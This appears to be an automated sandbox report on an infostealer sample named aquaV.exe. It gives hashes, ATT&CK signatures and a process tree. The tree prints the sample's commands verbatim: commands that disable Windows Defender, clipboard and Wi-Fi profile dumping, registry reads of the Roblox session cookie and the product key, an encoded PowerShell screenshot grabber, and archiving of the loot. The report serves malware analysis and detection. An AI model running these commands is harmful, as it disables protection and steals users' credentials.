Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-07-2024 13:04

General

  • Target

    aquaV.exe

  • Size

    7.4MB

  • MD5

    49aa048767303db8685115ce421fa3ec

  • SHA1

    259179216bae1ce03d880549f25de447324cf589

  • SHA256

    2dc86fd9e7b5746036284768f475ea9c3268c8bfc6cd4001f9a27bb923028467

  • SHA512

    f2b28a672ead669a7a133d253dfc142952055ad1579bd762a0cb75c281d79b524d30cb489d6bc7643191bce2cad1b150f47a9a632c8b804358cddee8bd6e1d1b

  • SSDEEP

    98304:2JSi8x9XQsTurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EAKhOC112j:2QP9VTurErvI9pWjgfPvzm6gsFE14A0

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aquaV.exe
    "C:\Users\Admin\AppData\Local\Temp\aquaV.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:976
    • C:\Users\Admin\AppData\Local\Temp\aquaV.exe
      "C:\Users\Admin\AppData\Local\Temp\aquaV.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aquaV.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aquaV.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('SERVERS DOWN!', 0, 'error', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:924
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('SERVERS DOWN!', 0, 'error', 0+16);close()"
          4⤵
            PID:4804
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:572
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:604
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1788
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4328
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1860
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2264
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5080
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:2716
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:116
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:60
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:668
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:828
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wzq0xdt5\wzq0xdt5.cmdline"
                5⤵
                  PID:3412
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3DA.tmp" "c:\Users\Admin\AppData\Local\Temp\wzq0xdt5\CSCD6F8F1D3B6248EAA0C0665C86F69645.TMP"
                    6⤵
                      PID:2676
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:552
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4316
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:404
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4200
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4356
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3956
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:3044
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2080
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4428
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:3636
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:4876
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:776
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:3952
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:3992
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:3044
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2600
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI9762\rar.exe a -r -hp"oyogz" "C:\Users\Admin\AppData\Local\Temp\uejbb.zip" *"
                                        3⤵
                                          PID:3224
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI9762\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI9762\rar.exe a -r -hp"oyogz" "C:\Users\Admin\AppData\Local\Temp\uejbb.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2532
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:2664
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4048
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:2444
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic computersystem get totalphysicalmemory
                                                4⤵
                                                  PID:1380
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                3⤵
                                                  PID:348
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic csproduct get uuid
                                                    4⤵
                                                      PID:3868
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                    3⤵
                                                      PID:3856
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1016
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      3⤵
                                                        PID:60
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic path win32_VideoController get name
                                                          4⤵
                                                          • Detects videocard installed
                                                          PID:2248
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                        3⤵
                                                          PID:3276
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4876
                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                      1⤵
                                                        PID:3956

                                                      Network

                                                      MITRE ATT&CK Matrix

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                        Filesize

                                                        2KB

                                                        MD5

                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                        SHA1

                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                        SHA256

                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                        SHA512

                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        64B

                                                        MD5

                                                        367b1c81198bfdcdba813c2c336627a3

                                                        SHA1

                                                        37fe6414eafaaed4abb91c1aafde62c5b688b711

                                                        SHA256

                                                        1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

                                                        SHA512

                                                        e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

